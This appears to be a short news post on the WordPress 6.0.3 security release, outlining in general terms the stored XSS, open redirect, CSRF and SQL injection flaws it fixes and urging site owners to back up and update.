WordPress has released WordPress 6.0.3, a security release that fixes 16 vulnerabilities. WordPress is urging users to update their sites as soon as possible to address these vulnerabilities. WordPress official have announced the updates affect all versions of WordPress from 3.7.
WordPress does not offer a description of the severity of the vulnerabilities, however given the types of vulnerabilities WordPress acknowledged and the large number of them, it may be a good idea to take this security release seriously and update your WordPress site immediately.
WordPress 6.0.3 addresses the following vulnerabilities
Multiple stored XSS Vulnerabilities
A stored XSS vulnerability occurs when the payload is uploaded and stored on the victim’s website servers. This kind of exposure arises through an error in the code where the input point doesn’t effectively filter what can be uploaded, resulting in the ability to upload a malicious script or some other unexpected file.
Open Redirect Vulnerability
This vulnerability allows attackers to take advantage of website redirects, in particular the ‘are you sure’ confirmation message in WordPress. WordPress officials haven’t outlined exactly what the vulnerability is; considering the vulnerability affects sensitive security and access related functions, it could potentially be serious.
Cross-Site Request Forgery
This vulnerability allowed attackers to mislead administrative WordPress users to perform an action such as follow a link. This can compromise the website as attackers can obtain website logins by misleading WordPress administrators to change their logins through a fake login page.
SQL Injection Due to Improper Sanitisation
An SQL Injection vulnerability permits hackers to input data into the server’s database. Improper sanitization relates to security checks that limits what can be input. This causes security threats as the WordPress database holds sensitive information such as passwords.
How might this affect you?
It is critical that you update your website to ensure it is not exposed to these security vulnerabilities. It should be noted though, if your website hasn’t been updated since the release of WordPress version 6, the update could potentially lead to bugs. It is advised to perform a backup prior to updating the system.